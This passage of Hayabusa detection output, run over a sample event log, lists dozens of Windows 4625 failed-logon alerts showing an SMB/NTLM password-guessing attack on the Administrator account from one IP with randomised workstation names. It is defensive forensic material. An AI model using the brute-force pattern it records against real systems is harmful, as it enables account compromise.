NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TZoWEcU6VbEnrLpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LIfEzNQWwvrai4ga : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DhImfqWz7SHId9hE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s6sekQfneNE5uFtx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iEQ6KkZEHGcSgdA8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qzxJYBbM7ZMaaGOo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wO5GFBqSltNfjtQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PdsMzjfP1ZcPju2i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2LqpKmoCX9slPXie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ouHvw1LXTN3OSFYb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tZIB1QO7hfugceJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u4QU2BQ0u5tJsdjG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0P7NKiKCmLvu6L1L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4obkK4RfsLZe5gdi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JRUDpDLhgop8d1el : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LvdsNkFqfFWRePXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5wvd8c1jYrEZMcKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AWvECxgkvWdg9Zdc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lHHPOAYSMSp3BhX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rJicXUMfrx9BOzHI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eybrQWvrvwSkNADJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VVMPCaQB0XteDSwC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lbjjLoATZE6KPIQv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tips954DRcYeIB2T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nLe9aMiMz0akxfWW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: csroGB9KZOZkb5sY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Zl4Rc25RsvJ7Y9H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C5CxqCFOIJBMZCD6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gVPwxpR05F3B5aXp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nP317UkK2DhTD5Rd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ir3c7dqXm1LhbfqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1U1QZiJSrEufxF3b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HZnDnDhTPuC9n5A1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72gY1ClzwuisAhKW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nrneLGOZCwPIeQgT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dm3gGV2yR4B3yrJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fzeklLG1KCTE5FpP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uZPwxCw3EWy9NShk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MalB3OcsOsRaMtS3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XMZMqCYPHO3n4RIh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1VUeIuU1rQPISNA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: md4ioB8wNiaz2EKB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nM8QaFeqwDfJZ1gc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlR75rMhpLnfQZbC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WF8BcOe4YUDYTXkj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FK0Iiao20PyPmtTk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kQbCbAHrQilFmMZP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VUdXQOw98VVoksDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fISqpC8eKlaQGabv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s5Y0VryMAHjtB3n2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bsjAHlztFIC8tBt0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CiEQlAlTOhqOKpmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i7lUqZMROQXNUtQm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0eFCGEtOLzjUxI5v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CqfOAGcVcwSgaeo3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2hcqVJzkVgvUnebk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9ZpqiTGXqJlAQTZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qCzXKlJ2vPeqqdfa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tITW0ihpErFk3nKp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MdQqr1T4frPNlulf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: niiXRpP5AVHpG9Hu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EThR98jZUdwNxbXQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBsJcIw859FfEkLD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kG4Tv5vauSWhbj8F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 453tjgRGMu46vC33 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1fnzhhfszxJWxLCT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWPkeL8TnAbC1nSV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JrDmUzyK4Xxx6Jn1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bMTf9D2yjumfS9LM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8cCs65ithseTCORa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QBrGAScjpAdScGmJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n90F99qBpmUUVLId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MLeOkIG0hVHIOnN7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vVx5uUtkaFIf7PWZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kgd7lCQUQ3dHN18S : IP Address: 192.168.198.149 : AuthPackage: 